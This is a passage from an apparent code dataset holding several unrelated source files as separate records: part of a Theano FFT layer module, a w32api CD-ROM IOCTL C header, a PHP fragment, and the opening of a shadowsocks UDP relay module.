to precompute fft matrix\n\n if nx != ny, we need to matrices\n\n '''\n super(FFT2Layer, self).__init__(incoming, **kwargs)\n self.is_3d = len(data_shape) == 5\n self.data_shape = data_shape\n if self.is_3d:\n n, _, nx, ny, nt = data_shape\n else:\n n, _, nx, ny = data_shape\n # create matrix which performs fft\n\n if inv:\n fourier_mat_x = inverse_fourier_matrix(nx, nx)\n fourier_mat_y = inverse_fourier_matrix(ny, ny) if nx != ny else fourier_mat_x\n else:\n fourier_mat_x = fourier_matrix(nx, nx)\n fourier_mat_y = fourier_matrix(ny, ny) if nx != ny else fourier_mat_x\n\n self.real_fft_x = np.real(fourier_mat_x).astype(theano.config.floatX)\n self.complex_fft_x = np.imag(fourier_mat_x).astype(theano.config.floatX)\n self.real_fft_y = np.real(fourier_mat_y).astype(theano.config.floatX)\n self.complex_fft_y = np.imag(fourier_mat_y).astype(theano.config.floatX)\n\n def transform(self, input):\n '''\n Perform fourier transform using Fourier matrix\n\n Parameters\n ------------------------------\n input must be of 4d tensor\n with shape [n, 2, nx, ny] where [nx, ny] == self.data_shape. n means\n number of data. 
2 means channels for real and complex part of the input\n (channel 1 == real, channel 2 = complex)\n uses real values to simulate the complex operation\n\n Returns\n ------------------------------\n tensor of the shape [n, 2, nx, ny] which is equivalent to fourier\n transform\n '''\n u = input[0]\n v = input[1]\n real_fft_x = self.real_fft_x\n complex_fft_x = self.complex_fft_x\n real_fft_y = self.real_fft_y\n complex_fft_y = self.complex_fft_y\n\n out_u = T.dot(u, real_fft_y.T) - T.dot(v, complex_fft_y.T)\n out_v = T.dot(u, complex_fft_y.T) + T.dot(v, real_fft_y.T)\n out_u2 = T.dot(real_fft_x, out_u) - T.dot(complex_fft_x, out_v)\n out_v2 = T.dot(complex_fft_x, out_u) + T.dot(real_fft_x, out_v)\n\n return T.stack([out_u2, out_v2])\n\n def get_output_for(self, input, **kwargs):\n '''\n Computes 2D FFT. Input layer must have dimension [n, 2, nx, ny]\n '''\n if self.is_3d:\n\n n, nc, nx, ny, nt = self.data_shape\n lin = T.transpose(input, axes=(0, 4, 1, 2, 3))\n lin = lin.reshape((-1, nc, nx, ny))\n lout, updates = theano.scan(self.transform, sequences=lin)\n lout = lout.reshape((-1, nt, nc, nx, ny))\n out = T.transpose(lout, axes=(0, 2, 3, 4, 1))\n return out\n\n # def loop_over_n(i, arr):\n # out, updates = theano.scan(self.transform,\n # sequences=arr[:, :, i])[0]\n # return out\n\n # nt = self.data_shape[-1]\n # out, updates = theano.scan(loop_over_n,\n # non_sequences=input,\n # sequences=xrange(nt))\n # return out\n\n out, updates = theano.scan(self.transform, sequences=input)\n return out\n\n\nclass FFTCLayer(Layer):\n def __init__(self, incoming, data_shape, norm=None,\n inv=False, **kwargs):\n '''\n\n Assumes data is in the format of (n, 2, nx, ny[, nt])\n\n Applies FFTC along the last axis\n\n '''\n super(FFTCLayer, self).__init__(incoming, **kwargs)\n self.fn = fft if not inv else ifft\n self.is_3d = len(data_shape) == 5\n self.norm = norm\n # if isinstance(axes, int):\n # axes = (axes,)\n\n # # Note that because we are simulating complex number, with 2 channels,\n # # we need to be careful when we invoke axes=(-1) and so we need to make\n # # sure we fix all -n to -n-1.\n # axes_list = []\n # for ax in axes:\n # if ax < 0:\n # axes_list.append(ax-1)\n # else:\n # axes_list.append(ax)\n # axes = tuple(axes_list)\n # print(axes)\n\n # self.axes = axes\n\n def get_output_for(self, input, **kwargs):\n '''\n Computes FFTC. 
Input layer must have dimension\n '''\n if self.is_3d:\n # Convert to (n, nx, ny[, nt], 2) for fft\n tmp = input.dimshuffle((0, 2, 3, 4, 1))\n tmp_shifted = ifftshift(tmp, axes=(-2,))\n tmp_tfx_shifted = self.fn(tmp_shifted, norm=self.norm)\n tmp_tfx = fftshift(tmp_tfx_shifted, axes=(-2,))\n # Convert back to (n, 2, nx, ny[, nt])\n return tmp_tfx.dimshuffle((0, 4, 1, 2, 3))\n\n else:\n # shape: [n, nc, nx, nt]\n tmp = input.dimshuffle((0, 2, 3, 1))\n data_xf = ifftshift(tmp, axes=(-2,))\n data_xt = self.fn(data_xf, norm=self.norm)\n data_xt = fftshift(data_xt, axes=(-2,))\n return data_xt.dimshuffle((0, 3, 1, 2))\n\nif use_cuda:\n FFT2Layer = FFT2GPULayer\nelse:\n # FFT2Layer = FT2Layer\n FFT2Layer = FFT2CPULayer\n\n# def FT2Layer(incoming, data_shape):\n# net = FFTLayer(incoming, data_shape)\n# net = TransposeLayer(net)\n# net = FFTLayer(net, data_shape)\n# net = TransposeLayer(net)\n# return net\n\n\n# def IFT2Layer(incoming, data_shape):\n# net = FFTLayer(incoming, data_shape, inv=True)\n# net = TransposeLayer(net)\n# net = FFTLayer(net, data_shape, inv=True)\n# net = TransposeLayer(net)\n# return net\n\n\n# def fftshift(x):\n# return x\n\n\n# def ifftshift(x):\n# return x\n\n"} {"text": "/*\n * ntddcdrm.h\n *\n * CDROM IOCTL interface.\n *\n * This file is part of the w32api package.\n *\n * Contributors:\n * Created by Casper S. Hornstrup \n *\n * THIS SOFTWARE IS NOT COPYRIGHTED\n *\n * This source code is offered for use in the public domain. You may\n * use, modify or distribute it freely.\n *\n * This code is distributed in the hope that it will be useful but\n * WITHOUT ANY WARRANTY. ALL WARRANTIES, EXPRESS OR IMPLIED ARE HEREBY\n * DISCLAIMED. This includes but is not limited to warranties of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n *\n */\n\n#ifndef _NTDDCDRM_\n#define _NTDDCDRM_\n\n#include \"ntddstor.h\"\n\n#ifdef __cplusplus\nextern \"C\" {\n#endif\n\n#define IOCTL_CDROM_BASE FILE_DEVICE_CD_ROM\n\n#define IOCTL_CDROM_CHECK_VERIFY \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x0200, METHOD_BUFFERED, FILE_READ_ACCESS)\n\n#define IOCTL_CDROM_FIND_NEW_DEVICES \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x0206, METHOD_BUFFERED, FILE_READ_ACCESS)\n\n#define IOCTL_CDROM_GET_CONFIGURATION \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x0016, METHOD_BUFFERED, FILE_READ_ACCESS)\n\n#define IOCTL_CDROM_GET_CONTROL \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x000D, METHOD_BUFFERED, FILE_READ_ACCESS)\n\n#define IOCTL_CDROM_GET_DRIVE_GEOMETRY \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x0013, METHOD_BUFFERED, FILE_READ_ACCESS)\n\n#define IOCTL_CDROM_GET_DRIVE_GEOMETRY_EX \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x0014, METHOD_BUFFERED, FILE_READ_ACCESS)\n\n#define IOCTL_CDROM_GET_LAST_SESSION \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x000E, METHOD_BUFFERED, FILE_READ_ACCESS)\n\n#define IOCTL_CDROM_GET_VOLUME \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x0005, METHOD_BUFFERED, FILE_READ_ACCESS)\n\n#define IOCTL_CDROM_PAUSE_AUDIO \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x0003, METHOD_BUFFERED, FILE_READ_ACCESS)\n\n#define IOCTL_CDROM_PLAY_AUDIO_MSF \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x0006, METHOD_BUFFERED, FILE_READ_ACCESS)\n\n#define IOCTL_CDROM_RAW_READ \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x000F, METHOD_OUT_DIRECT, FILE_READ_ACCESS)\n\n#define IOCTL_CDROM_DISK_TYPE \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x0010, METHOD_BUFFERED, FILE_ANY_ACCESS)\n\n#define IOCTL_CDROM_READ_Q_CHANNEL \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x000B, METHOD_BUFFERED, FILE_READ_ACCESS)\n\n#define IOCTL_CDROM_READ_TOC \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x0000, METHOD_BUFFERED, FILE_READ_ACCESS)\n\n#define 
IOCTL_CDROM_READ_TOC_EX \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x0015, METHOD_BUFFERED, FILE_READ_ACCESS)\n\n#define IOCTL_CDROM_RESUME_AUDIO \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x0004, METHOD_BUFFERED, FILE_READ_ACCESS)\n\n#define IOCTL_CDROM_SEEK_AUDIO_MSF \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x0001, METHOD_BUFFERED, FILE_READ_ACCESS)\n\n#define IOCTL_CDROM_SET_VOLUME \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x000A, METHOD_BUFFERED, FILE_READ_ACCESS)\n\n#define IOCTL_CDROM_SIMBAD \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x1003, METHOD_BUFFERED, FILE_READ_ACCESS)\n\n#define IOCTL_CDROM_STOP_AUDIO \\\n CTL_CODE(IOCTL_CDROM_BASE, 0x0002, METHOD_BUFFERED, FILE_READ_ACCESS)\n\n\n#define MAXIMUM_NUMBER_TRACKS 100\n#define MAXIMUM_CDROM_SIZE 804\n#define MINIMUM_CDROM_READ_TOC_EX_SIZE 2\n\ntypedef struct _TRACK_DATA {\n UCHAR Reserved;\n UCHAR Control : 4;\n UCHAR Adr : 4;\n UCHAR TrackNumber;\n UCHAR Reserved1;\n UCHAR Address[4];\n} TRACK_DATA, *PTRACK_DATA;\n\n/* CDROM_DISK_DATA.DiskData flags */\n#define CDROM_DISK_AUDIO_TRACK 0x00000001\n#define CDROM_DISK_DATA_TRACK 0x00000002\n\ntypedef struct _CDROM_DISK_DATA {\n ULONG DiskData;\n} CDROM_DISK_DATA, *PCDROM_DISK_DATA;\n\ntypedef struct _CDROM_PLAY_AUDIO_MSF {\n UCHAR StartingM;\n UCHAR StartingS;\n UCHAR StartingF;\n UCHAR EndingM;\n UCHAR EndingS;\n UCHAR EndingF;\n} CDROM_PLAY_AUDIO_MSF, *PCDROM_PLAY_AUDIO_MSF;\n\n/* CDROM_READ_TOC_EX.Format constants */\n#define CDROM_READ_TOC_EX_FORMAT_TOC 0x00\n#define CDROM_READ_TOC_EX_FORMAT_SESSION 0x01\n#define CDROM_READ_TOC_EX_FORMAT_FULL_TOC 0x02\n#define CDROM_READ_TOC_EX_FORMAT_PMA 0x03\n#define CDROM_READ_TOC_EX_FORMAT_ATIP 0x04\n#define CDROM_READ_TOC_EX_FORMAT_CDTEXT 0x05\n\ntypedef struct _CDROM_READ_TOC_EX {\n UCHAR Format : 4;\n UCHAR Reserved1 : 3;\n UCHAR Msf : 1;\n UCHAR SessionTrack;\n UCHAR Reserved2;\n UCHAR Reserved3;\n} CDROM_READ_TOC_EX, *PCDROM_READ_TOC_EX;\n\ntypedef struct _CDROM_SEEK_AUDIO_MSF {\n UCHAR M;\n UCHAR S;\n UCHAR F;\n} CDROM_SEEK_AUDIO_MSF, *PCDROM_SEEK_AUDIO_MSF;\n\n/* CDROM_SUB_Q_DATA_FORMAT.Format constants */\n#define IOCTL_CDROM_SUB_Q_CHANNEL 0x00\n#define IOCTL_CDROM_CURRENT_POSITION 0x01\n#define IOCTL_CDROM_MEDIA_CATALOG 0x02\n#define IOCTL_CDROM_TRACK_ISRC 0x03\n\ntypedef struct _CDROM_SUB_Q_DATA_FORMAT {\n UCHAR Format;\n UCHAR Track;\n} CDROM_SUB_Q_DATA_FORMAT, *PCDROM_SUB_Q_DATA_FORMAT;\n\ntypedef struct _CDROM_TOC {\n UCHAR Length[2];\n UCHAR FirstTrack;\n UCHAR LastTrack;\n TRACK_DATA TrackData[MAXIMUM_NUMBER_TRACKS];\n} CDROM_TOC, *PCDROM_TOC;\n\n#define CDROM_TOC_SIZE sizeof(CDROM_TOC)\n\ntypedef struct _CDROM_TOC_SESSION_DATA {\n UCHAR Length[2];\n UCHAR FirstCompleteSession;\n UCHAR LastCompleteSession;\n TRACK_DATA TrackData[1];\n} CDROM_TOC_SESSION_DATA, *PCDROM_TOC_SESSION_DATA;\n\ntypedef struct _CDROM_TOC_ATIP_DATA_BLOCK {\n UCHAR CdrwReferenceSpeed : 3;\n UCHAR Reserved3 : 1;\n UCHAR WritePower : 3;\n UCHAR True1 : 1;\n UCHAR Reserved4 : 6;\n UCHAR UnrestrictedUse : 1;\n UCHAR Reserved5 : 1;\n UCHAR A3Valid : 1;\n UCHAR A2Valid : 1;\n UCHAR A1Valid : 1;\n UCHAR Reserved6 : 3;\n UCHAR IsCdrw : 1;\n UCHAR True2 : 1;\n UCHAR Reserved7;\n UCHAR LeadInMsf[3];\n UCHAR Reserved8;\n UCHAR LeadOutMsf[3];\n UCHAR Reserved9;\n UCHAR A1Values[3];\n UCHAR Reserved10;\n UCHAR A2Values[3];\n UCHAR Reserved11;\n UCHAR A3Values[3];\n UCHAR Reserved12;\n} CDROM_TOC_ATIP_DATA_BLOCK, *PCDROM_TOC_ATIP_DATA_BLOCK;\n\ntypedef struct _CDROM_TOC_ATIP_DATA {\n UCHAR Length[2];\n UCHAR Reserved1;\n UCHAR Reserved2;\n CDROM_TOC_ATIP_DATA_BLOCK Descriptors[0];\n} CDROM_TOC_ATIP_DATA, 
*PCDROM_TOC_ATIP_DATA;\n\n/* CDROM_TOC_CD_TEXT_DATA_BLOCK.PackType constants */\n#define CDROM_CD_TEXT_PACK_ALBUM_NAME 0x80\n#define CDROM_CD_TEXT_PACK_PERFORMER 0x81\n#define CDROM_CD_TEXT_PACK_SONGWRITER 0x82\n#define CDROM_CD_TEXT_PACK_COMPOSER 0x83\n#define CDROM_CD_TEXT_PACK_ARRANGER 0x84\n#define CDROM_CD_TEXT_PACK_MESSAGES 0x85\n#define CDROM_CD_TEXT_PACK_DISC_ID 0x86\n#define CDROM_CD_TEXT_PACK_GENRE 0x87\n#define CDROM_CD_TEXT_PACK_TOC_INFO 0x88\n#define CDROM_CD_TEXT_PACK_TOC_INFO2 0x89\n#define CDROM_CD_TEXT_PACK_UPC_EAN 0x8e\n#define CDROM_CD_TEXT_PACK_SIZE_INFO 0x8f\n\ntypedef struct _CDROM_TOC_CD_TEXT_DATA_BLOCK {\n UCHAR PackType;\n UCHAR TrackNumber : 7;\n UCHAR ExtensionFlag : 1;\n UCHAR SequenceNumber;\n UCHAR CharacterPosition : 4;\n UCHAR BlockNumber : 3;\n UCHAR Unicode : 1;\n _ANONYMOUS_UNION union {\n UCHAR Text[12];\n WCHAR WText[6];\n } DUMMYUNIONNAME;\n UCHAR CRC[2];\n} CDROM_TOC_CD_TEXT_DATA_BLOCK, *PCDROM_TOC_CD_TEXT_DATA_BLOCK;\n\ntypedef struct _CDROM_TOC_CD_TEXT_DATA {\n UCHAR Length[2];\n UCHAR Reserved1;\n UCHAR Reserved2;\n CDROM_TOC_CD_TEXT_DATA_BLOCK Descriptors[0];\n} CDROM_TOC_CD_TEXT_DATA, *PCDROM_TOC_CD_TEXT_DATA;\n\n/* CDROM_TOC_FULL_TOC_DATA_BLOCK.Adr constants */\n#define ADR_NO_MODE_INFORMATION 0x0\n#define ADR_ENCODES_CURRENT_POSITION 0x1\n#define ADR_ENCODES_MEDIA_CATALOG 0x2\n#define ADR_ENCODES_ISRC 0x3\n\ntypedef struct _CDROM_TOC_FULL_TOC_DATA_BLOCK {\n UCHAR SessionNumber;\n UCHAR Control : 4;\n UCHAR Adr : 4;\n UCHAR Reserved1;\n UCHAR Point;\n UCHAR MsfExtra[3];\n UCHAR Zero;\n UCHAR Msf[3];\n} CDROM_TOC_FULL_TOC_DATA_BLOCK, *PCDROM_TOC_FULL_TOC_DATA_BLOCK;\n\ntypedef struct _CDROM_TOC_FULL_TOC_DATA {\n UCHAR Length[2];\n UCHAR FirstCompleteSession;\n UCHAR LastCompleteSession;\n CDROM_TOC_FULL_TOC_DATA_BLOCK Descriptors[0];\n} CDROM_TOC_FULL_TOC_DATA, *PCDROM_TOC_FULL_TOC_DATA;\n\ntypedef struct _CDROM_TOC_PMA_DATA {\n UCHAR Length[2];\n UCHAR Reserved1;\n UCHAR Reserved2;\n CDROM_TOC_FULL_TOC_DATA_BLOCK Descriptors[0];\n} CDROM_TOC_PMA_DATA, *PCDROM_TOC_PMA_DATA;\n\n/* SUB_Q_HEADER.AudioStatus constants */\n#define AUDIO_STATUS_NOT_SUPPORTED 0x00\n#define AUDIO_STATUS_IN_PROGRESS 0x11\n#define AUDIO_STATUS_PAUSED 0x12\n#define AUDIO_STATUS_PLAY_COMPLETE 0x13\n#define AUDIO_STATUS_PLAY_ERROR 0x14\n#define AUDIO_STATUS_NO_STATUS 0x15\n\ntypedef struct _SUB_Q_HEADER {\n UCHAR Reserved;\n UCHAR AudioStatus;\n UCHAR DataLength[2];\n} SUB_Q_HEADER, *PSUB_Q_HEADER;\n\ntypedef struct _SUB_Q_MEDIA_CATALOG_NUMBER {\n SUB_Q_HEADER Header;\n UCHAR FormatCode;\n UCHAR Reserved[3];\n UCHAR Reserved1 : 7;\n UCHAR Mcval :1;\n UCHAR MediaCatalog[15];\n} SUB_Q_MEDIA_CATALOG_NUMBER, *PSUB_Q_MEDIA_CATALOG_NUMBER;\n\ntypedef struct _SUB_Q_TRACK_ISRC {\n SUB_Q_HEADER Header;\n UCHAR FormatCode;\n UCHAR Reserved0;\n UCHAR Track;\n UCHAR Reserved1;\n UCHAR Reserved2 : 7;\n UCHAR Tcval : 1;\n UCHAR TrackIsrc[15];\n} SUB_Q_TRACK_ISRC, *PSUB_Q_TRACK_ISRC;\n\ntypedef struct _SUB_Q_CURRENT_POSITION {\n SUB_Q_HEADER Header;\n UCHAR FormatCode;\n UCHAR Control : 4;\n UCHAR ADR : 4;\n UCHAR TrackNumber;\n UCHAR IndexNumber;\n UCHAR AbsoluteAddress[4];\n UCHAR TrackRelativeAddress[4];\n} SUB_Q_CURRENT_POSITION, *PSUB_Q_CURRENT_POSITION;\n\ntypedef union _SUB_Q_CHANNEL_DATA {\n SUB_Q_CURRENT_POSITION CurrentPosition;\n SUB_Q_MEDIA_CATALOG_NUMBER MediaCatalog;\n SUB_Q_TRACK_ISRC TrackIsrc;\n} SUB_Q_CHANNEL_DATA, *PSUB_Q_CHANNEL_DATA;\n\n/* CDROM_AUDIO_CONTROL.LbaFormat constants */\n#define AUDIO_WITH_PREEMPHASIS 0x1\n#define DIGITAL_COPY_PERMITTED 0x2\n#define 
AUDIO_DATA_TRACK 0x4\n#define TWO_FOUR_CHANNEL_AUDIO 0x8\n\ntypedef struct _CDROM_AUDIO_CONTROL {\n\tUCHAR LbaFormat;\n\tUSHORT LogicalBlocksPerSecond;\n} CDROM_AUDIO_CONTROL, *PCDROM_AUDIO_CONTROL;\n\ntypedef struct _VOLUME_CONTROL {\n UCHAR PortVolume[4];\n} VOLUME_CONTROL, *PVOLUME_CONTROL;\n\ntypedef enum _TRACK_MODE_TYPE {\n\tYellowMode2,\n\tXAForm2,\n\tCDDA\n} TRACK_MODE_TYPE, *PTRACK_MODE_TYPE;\n\ntypedef struct __RAW_READ_INFO {\n\tLARGE_INTEGER DiskOffset;\n\tULONG SectorCount;\n\tTRACK_MODE_TYPE TrackMode;\n} RAW_READ_INFO, *PRAW_READ_INFO;\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif /* _NTDDCDRM_ */\n"} {"text": "method;\n return $this->object->$sMethod($sValue, $this->params);\n }\n}\n\n// EOF"} {"text": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#\n# Copyright 2015 clowwindy\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n# SOCKS5 UDP Request\n# +----+------+------+----------+----------+----------+\n# |RSV | FRAG | ATYP | DST.ADDR | DST.PORT | DATA |\n# +----+------+------+----------+----------+----------+\n# | 2 | 1 | 1 | Variable | 2 | Variable |\n# +----+------+------+----------+----------+----------+\n\n# SOCKS5 UDP Response\n# +----+------+------+----------+----------+----------+\n# |RSV | FRAG | ATYP | DST.ADDR | DST.PORT | DATA |\n# +----+------+------+----------+----------+----------+\n# | 2 | 1 | 1 | Variable | 2 | Variable |\n# +----+------+------+----------+----------+----------+\n\n# shadowsocks UDP Request (before encrypted)\n# +------+----------+----------+----------+\n# | ATYP | DST.ADDR | DST.PORT | DATA |\n# +------+----------+----------+----------+\n# | 1 | Variable | 2 | Variable |\n# +------+----------+----------+----------+\n\n# shadowsocks UDP Response (before encrypted)\n# +------+----------+----------+----------+\n# | ATYP | DST.ADDR | DST.PORT | DATA |\n# +------+----------+----------+----------+\n# | 1 | Variable | 2 | Variable |\n# +------+----------+----------+----------+\n\n# shadowsocks UDP Request and Response (after encrypted)\n# +-------+--------------+\n# | IV | PAYLOAD |\n# +-------+--------------+\n# | Fixed | Variable |\n# +-------+--------------+\n\n# HOW TO NAME THINGS\n# ------------------\n# `dest` means destination server, which is from DST fields in the SOCKS5\n# request\n# `local` means local server of shadowsocks\n# `remote` means remote server of shadowsocks\n# `client` means UDP clients that connects to other servers\n# `server` means the UDP server that handles user requests\n\nfrom __future__ import absolute_import, division, print_function, \\\n with_statement\n\nimport time\nimport socket\nimport logging\nimport struct\nimport errno\nimport random\nimport binascii\nimport traceback\n\nfrom shadowsocks import encrypt, obfs, eventloop, lru_cache, common, shell\nfrom shadowsocks.common import pre_parse_header, parse_header, pack_addr, IPNetwork, PortRange\n\n# for each handler, we have 2 stream directions:\n# upstream: from client to server direction\n# read local and write to remote\n# downstream: from server to client 
direction\n# read remote and write to local\n\nSTREAM_UP = 0\nSTREAM_DOWN = 1\n\n# for each stream, it's waiting for reading, or writing, or both\nWAIT_STATUS_INIT = 0\nWAIT_STATUS_READING = 1\nWAIT_STATUS_WRITING = 2\nWAIT_STATUS_READWRITING = WAIT_STATUS_READING | WAIT_STATUS_WRITING\n\nBUF_SIZE = 65536\nDOUBLE_SEND_BEG_IDS = 16\nPOST_MTU_MIN = 500\nPOST_MTU_MAX = 1400\nSENDING_WINDOW_SIZE = 8192\n\nSTAGE_INIT = 0\nSTAGE_RSP_ID = 1\nSTAGE_DNS = 2\nSTAGE_CONNECTING = 3\nSTAGE_STREAM = 4\nSTAGE_DESTROYED = -1\n\nCMD_CONNECT = 0\nCMD_RSP_CONNECT = 1\nCMD_CONNECT_REMOTE = 2\nCMD_RSP_CONNECT_REMOTE = 3\nCMD_POST = 4\nCMD_SYN_STATUS = 5\nCMD_POST_64 = 6\nCMD_SYN_STATUS_64 = 7\nCMD_DISCONNECT = 8\n\nCMD_VER_STR = b\"\\x08\"\n\nRSP_STATE_EMPTY = b\"\"\nRSP_STATE_REJECT = b\"\\x00\"\nRSP_STATE_CONNECTED = b\"\\x01\"\nRSP_STATE_CONNECTEDREMOTE = b\"\\x02\"\nRSP_STATE_ERROR = b\"\\x03\"\nRSP_STATE_DISCONNECT = b\"\\x04\"\nRSP_STATE_REDIRECT = b\"\\x05\"\n\ndef client_key(source_addr, server_af):\n # notice this is server af, not dest af\n return '%s:%s:%d' % (source_addr[0], source_addr[1], server_af)\n\nclass UDPRelay(object):\n\n def __init__(\n self,\n config,\n dns_resolver,\n is_local,\n stat_callback=None,\n stat_counter=None):\n self._config = config\n if config.get('connect_verbose_info', 0) > 0:\n common.connect_log = logging.info\n\n if config.get('connect_hex_data', 0) > 0:\n self._connect_hex_data = True\n else:\n self._connect_hex_data = False\n\n if is_local:\n self._listen_addr = config['local_address']\n self._listen_port = config['local_port']\n self._remote_addr = config['server']\n self._remote_port = config['server_port']\n else:\n self._listen_addr = config['server']\n self._listen_port = config['server_port']\n self._remote_addr = None\n self._remote_port = None\n self._dns_resolver = dns_resolver\n self._password = common.to_bytes(config['password'])\n self._method = config['method']\n self._timeout = config['timeout']\n self._is_local = is_local\n self._udp_cache_size = config['udp_cache']\n self._cache = lru_cache.LRUCache(\n timeout=config['udp_timeout'],\n close_callback=self._close_client_pair)\n self._cache_dns_client = lru_cache.LRUCache(\n timeout=10, close_callback=self._close_client_pair)\n self._client_fd_to_server_addr = {}\n #self._dns_cache = lru_cache.LRUCache(timeout=1800)\n self._eventloop = None\n self._closed = False\n self.server_transfer_ul = 0\n self.server_transfer_dl = 0\n\n self.connected_iplist = []\n self.wrong_iplist = {}\n self.detect_log_list = []\n\n self.is_cleaning_connected_iplist = False\n self.is_cleaning_wrong_iplist = False\n self.is_cleaning_detect_log = False\n self.is_cleaning_mu_detect_log_list = False\n self.is_cleaning_mu_connected_iplist = False\n\n if 'users_table' in self._config:\n self.multi_user_table = self._config['users_table']\n\n self.mu_server_transfer_ul = {}\n self.mu_server_transfer_dl = {}\n self.mu_connected_iplist = {}\n self.mu_detect_log_list = {}\n\n self.is_pushing_detect_hex_list = False\n self.is_pushing_detect_text_list = False\n self.detect_hex_list = self._config['detect_hex_list'].copy()\n self.detect_text_list = self._config['detect_text_list'].copy()\n\n self.protocol_data = obfs.obfs(config['protocol']).init_data()\n self._protocol = obfs.obfs(config['protocol'])\n server_info = obfs.server_info(self.protocol_data)\n server_info.host = self._listen_addr\n server_info.port = self._listen_port\n if 'users_table' in self._config:\n server_info.users = self.multi_user_table\n else:\n server_info.users = 
{}\n server_info.is_multi_user = config[\"is_multi_user\"]\n server_info.protocol_param = config['protocol_param']\n server_info.obfs_param = ''\n server_info.iv = b''\n server_info.recv_iv = b''\n server_info.key_str = common.to_bytes(config['password'])\n try:\n server_info.key = encrypt.encrypt_key(self._password, self._method)\n except Exception:\n logging.error(\"UDP: method not support\")\n server_info.key = b''\n server_info.head_len = 30\n server_info.tcp_mss = 1452\n server_info.buffer_size = BUF_SIZE\n server_info.overhead = 0\n self._protocol.set_server_info(server_info)\n\n self._sockets = set()\n self._fd_to_handlers = {}\n self._reqid_to_hd = {}\n self._data_to_write_to_server_socket = []\n\n self._timeouts = [] # a list for all the handlers\n # we trim the timeouts once a while\n self._timeout_offset = 0 # last checked position for timeout\n self._handler_to_timeouts = {} # key: handler value: index in timeouts\n\n self._bind = config.get('out_bind', '')\n self._bindv6 = config.get('out_bindv6', '')\n self._ignore_bind_list = config.get('ignore_bind', [])\n\n if 'forbidden_ip' in config:\n self._forbidden_iplist = IPNetwork(config['forbidden_ip'])\n else:\n self._forbidden_iplist = None\n if 'forbidden_port' in config:\n self._forbidden_portset = PortRange(config['forbidden_port'])\n else:\n self._forbidden_portset = None\n if 'disconnect_ip' in config:\n self._disconnect_ipset = IPNetwork(config['disconnect_ip'])\n else:\n self._disconnect_ipset = None\n\n self._relay_rules = self._config['relay_rules'].copy()\n self._is_pushing_relay_rules = False\n\n addrs = socket.getaddrinfo(self._listen_addr, self._listen_port, 0,\n socket.SOCK_DGRAM, socket.SOL_UDP)\n if len(addrs) == 0:\n raise Exception(\"can't get addrinfo for %s:%d\" %\n (self._listen_addr, self._listen_port))\n af, socktype, proto, canonname, sa = addrs[0]\n server_socket = socket.socket(af, socktype, proto)\n server_socket.bind((self._listen_addr, self._listen_port))\n server_socket.setblocking(False)\n server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1024 * 1024)\n server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 1024 * 1024)\n self._server_socket = server_socket\n self._stat_callback = stat_callback\n\n def _get_a_server(self):\n server = self._config['server']\n server_port = self._config['server_port']\n if isinstance(server_port, list):\n server_port = random.choice(server_port)\n if isinstance(server, list):\n server = random.choice(server)\n logging.debug('chosen server: %s:%d', server, server_port)\n return server, server_port\n\n def add_transfer_u(self, user, transfer):\n if ((user is None or user == 0) and self._config[\"is_multi_user\"] != 0) or self._config[\"is_multi_user\"] == 0:\n self.server_transfer_ul += transfer\n else:\n if user not in self.mu_server_transfer_ul:\n self.mu_server_transfer_ul[user] = 0\n self.mu_server_transfer_ul[\n user] += transfer + self.server_transfer_ul\n self.server_transfer_ul = 0\n\n def add_transfer_d(self, user, transfer):\n if ((user is None or user == 0) and self._config[\"is_multi_user\"] != 0) or self._config[\"is_multi_user\"] == 0:\n self.server_transfer_dl += transfer\n else:\n if user not in self.mu_server_transfer_dl:\n self.mu_server_transfer_dl[user] = 0\n self.mu_server_transfer_dl[\n user] += transfer + self.server_transfer_dl\n self.server_transfer_dl = 0\n\n def _close_client_pair(self, client_pair):\n client, uid = client_pair\n self._close_client(client)\n\n def _close_client(self, client):\n if hasattr(client, 
'close'):\n if not self._is_local:\n if client.fileno() in self._client_fd_to_server_addr:\n logging.debug(\n 'close_client: %s' %\n (self._client_fd_to_server_addr[\n client.fileno()],))\n else:\n client.info('close_client')\n self._sockets.remove(client.fileno())\n self._eventloop.remove(client)\n del self._client_fd_to_server_addr[client.fileno()]\n client.close()\n else:\n # just an address\n client.info('close_client pass %s' % client)\n pass\n\n def _pre_parse_udp_header(self, data):\n if data is None:\n return\n datatype = common.ord(data[0])\n if datatype == 0x8:\n if len(data) >= 8:\n crc = binascii.crc32(data) & 0xffffffff\n if crc != 0xffffffff:\n logging.warn('uncorrect CRC32, maybe wrong password or '\n 'encryption method')\n return None\n cmd = common.ord(data[1])\n request_id = struct.unpack('>H', data[2:4])[0]\n data = data[4:-4]\n return (cmd, request_id, data)\n elif len(data) >= 6 and common.ord(data[1]) == 0x0:\n crc = binascii.crc32(data) & 0xffffffff\n if crc != 0xffffffff:\n logging.warn('uncorrect CRC32, maybe wrong password or '\n 'encryption method')\n return None\n cmd = common.ord(data[1])\n data = data[2:-4]\n return (cmd, 0, data)\n else:\n 